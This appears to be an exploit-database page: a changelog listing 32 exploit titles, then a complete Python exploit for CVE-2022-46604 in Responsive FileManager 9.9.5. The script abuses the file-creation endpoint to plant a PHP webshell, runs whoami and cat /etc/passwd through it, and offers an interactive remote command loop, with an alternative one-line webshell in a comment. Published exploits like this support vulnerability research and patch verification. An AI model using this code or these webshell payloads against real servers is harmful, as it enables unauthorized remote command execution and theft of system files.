
32 changes to exploits/shellcodes/ghdb Answerdev 1.0.3 - Account Takeover D-Link DIR-846 - Remote Command Execution (RCE) vulnerability Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow ERPNext 12.29 - Cross-Site Scripting (XSS) Liferay Portal 6.2.5 - Insecure Permissions GNU screen v4.9.0 - Privilege Escalation Apache Tomcat 10.1 - Denial Of Service PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) BTCPay Server v1.7.4 - HTML Injection. Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) ImageMagick 7.1.0-49 - DoS bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) Froxlor 2.0.3 Stable - Remote Code Execution (RCE) ImageMagick 7.1.0-49 - Arbitrary File Read itech TrainSmart r1044 - SQL injection Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) PhotoShow 3.0 - Remote Code Execution projectSend r1605 - Remote Code Exectution RCE Responsive FileManager 9.9.5 - Remote Code Execution (RCE) zstore 6.6.0 - Cross-Site Scripting (XSS) Binwalk v2.3.2 - Remote Command Execution (RCE) XWorm Trojan 2.1 - Null Pointer Derefernce DoS Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) Linux/x86_64 - bash Shellcode with xor encoding
158 lines
No EOL
6.1 KiB
Python
Executable file
158 lines
No EOL
6.1 KiB
Python
Executable file
# Exploit Title: Responsive FileManager 9.9.5 - Remote Code Execution (RCE)
|
|
# Date: 02-Feb-2023
|
|
# Exploit Author: Galoget Latorre (@galoget)
|
|
# Vendor Homepage: https://responsivefilemanager.com
|
|
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.9.5/responsive_filemanager.zip
|
|
# Dockerfile: https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604
|
|
# Version: 9.9.5
|
|
# Language: Python 3.x
|
|
# Tested on:
|
|
# - Ubuntu 22.04.5 LTS 64-bit
|
|
# - Debian GNU/Linux 10 (buster) 64-bit
|
|
# - Kali GNU/Linux 2022.3 64-bit
|
|
# CVE: CVE-2022-46604 (Konstantin Burov)
|
|
|
|
|
|
#!/usr/bin/python3
|
|
# -*- coding:utf-8 -*-
|
|
|
|
import sys
|
|
import requests
|
|
from bs4 import BeautifulSoup
|
|
from termcolor import colored, cprint
|
|
|
|
|
|
# Usage: python3 exploit.py <target.site>
|
|
# Example: python3 exploit.py 127.0.0.1
|
|
|
|
|
|
def banner():
|
|
"""
|
|
Function to print the banner
|
|
"""
|
|
|
|
banner_text = """
|
|
_____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___
|
|
| | | | __| ___ |_ | |_ |_ | ___ | | | _| _| | | |
|
|
| --| | | __| |___| | _| | | _| _| |___| |_ | . | . | | |_ |
|
|
|_____|\\___/|_____| |___|___|___|___| |_|___|___|___| |_|
|
|
|
|
File Creation Extension Bypass in Responsive FileManager ≤ 9.9.5 (RCE)
|
|
Exploit Author: Galoget Latorre (@galoget)
|
|
CVE Author: Konstantin Burov
|
|
"""
|
|
print(banner_text)
|
|
|
|
|
|
def usage_instructions():
|
|
"""
|
|
Function that validates the number of arguments.
|
|
The aplication MUST have 2 arguments:
|
|
- [0]: Name of the script
|
|
- [1]: Target site, which can be a domain or an IP Address
|
|
"""
|
|
if len(sys.argv) != 2:
|
|
print("Usage: python3 exploit.py <target.site>")
|
|
print("Example: python3 exploit.py 127.0.0.1")
|
|
sys.exit(0)
|
|
|
|
|
|
def run_command(web_session, webshell_url, command_to_run):
|
|
"""
|
|
Function that:
|
|
- Interacts with the webshell to run a command
|
|
- Cleans the response of the webshell
|
|
- Returns the response object and the output of the command
|
|
"""
|
|
webshell_response = web_session.get(url = webshell_url + f"?cmd={command_to_run}", headers = headers)
|
|
command_output_soup = BeautifulSoup(webshell_response.text, 'html.parser')
|
|
return (webshell_response, command_output_soup.find('pre').text)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
banner()
|
|
usage_instructions()
|
|
|
|
# Change this with the domain or IP address to attack
|
|
if sys.argv[1]:
|
|
host = sys.argv[1]
|
|
else:
|
|
host = "127.0.0.1"
|
|
|
|
headers = {
|
|
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
|
|
}
|
|
|
|
|
|
# URL to create a new file
|
|
target_url = f"http://{host}/filemanager/execute.php?action=create_file"
|
|
|
|
# Change this to customize the payload (i.e. The content of the malicious file that will be created)
|
|
payload = "<html><body><form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\"><input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\"><input type=\"SUBMIT\" value=\"Execute\"></form><pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?></pre></body></html>"
|
|
# oneliner_payload = " <?=`$_GET[_]`?>"
|
|
|
|
# URL to get a PHPSESSID value
|
|
cookie_url = f"http://{host}/filemanager/dialog.php"
|
|
|
|
# New Session
|
|
session = requests.Session()
|
|
|
|
# GET request to retrieve a PHPSESSID value
|
|
cprint(f"[*] Trying to get a PHPSESSID at {host}", "blue")
|
|
try:
|
|
session.get(url = cookie_url, headers = headers)
|
|
except:
|
|
cprint(f"[-] Something went wrong when trying to connect to '{host}'.", "red")
|
|
sys.exit(0)
|
|
|
|
if session.cookies.get_dict():
|
|
cprint("[+] PHPSESSID retrieved correctly.", "green")
|
|
cprint(f"[!] PHPSESSID: {session.cookies.get_dict()['PHPSESSID']}", "yellow")
|
|
else:
|
|
cprint("[-] Something went wrong when trying to get a PHPSESSID.", "red")
|
|
|
|
# Params, rename if you want
|
|
params = {"path": "shell.php", "path_thumb": "../thumbs/shell.php", "name": "shell.txt", "new_content": payload}
|
|
|
|
# POST request to create the webshell
|
|
cprint(f"\n[*] Attempting to create a webshell on {host}", "blue")
|
|
response = session.post(url = target_url, headers = headers, data = params)
|
|
|
|
# If the status code and the message match, we may have a webshell inside. ;)
|
|
if response.status_code == 200 and response.text == "File successfully saved.":
|
|
# Default webshell path
|
|
shell_url = f"http://{host}/source/shell.php"
|
|
|
|
# Verify if the shell was uploaded by running whoami and cat /etc/passwd
|
|
webshell, whoami_output = run_command(session, shell_url, "whoami")
|
|
webshell, passwd_output = run_command(session, shell_url, "cat /etc/passwd")
|
|
|
|
# Common users when getting a webshell
|
|
common_users = ["www-data", "apache", "nobody", "apache2", "root", "administrator", "admin"]
|
|
|
|
# Verify if the command was executed correctly
|
|
if webshell.status_code == 200 or whoami_output.lower() in common_users or "root:x::" in passwd_output:
|
|
cprint("[+] Webshell uploaded - Enjoy!", "green")
|
|
cprint(f"[!] Webshell available at '{shell_url}' - Enjoy!", "yellow")
|
|
cprint(f"[+] Running `whoami` command: {whoami_output}", "green")
|
|
|
|
|
|
# Ask to enter into a pseudo-interactive mode with the webshell
|
|
answer = input(colored("Do you want to enter into interactive mode with the webshell? (Y/N): ", "magenta"))
|
|
|
|
if answer.upper() == "Y":
|
|
cprint("\n[*] Entering into interactive mode, write 'exit' to quit.\n", "blue")
|
|
command = ""
|
|
while command != "exit":
|
|
command = input(colored(">> ", "cyan")).lower()
|
|
webshell, command_output = run_command(session, shell_url, command)
|
|
if command != "exit":
|
|
cprint(command_output, "cyan")
|
|
|
|
cprint("\n[*] Exiting...Bye!", "blue")
|
|
|
|
elif response.status_code == 403 and response.text == "The file is already existing":
|
|
cprint("[-] The file that you're trying to create is already on the server.", "red")
|
|
|
|
else:
|
|
cprint(f"[-] The server returned Status Code: '{response.status_code}' and this text: '{response.text}'", "red") |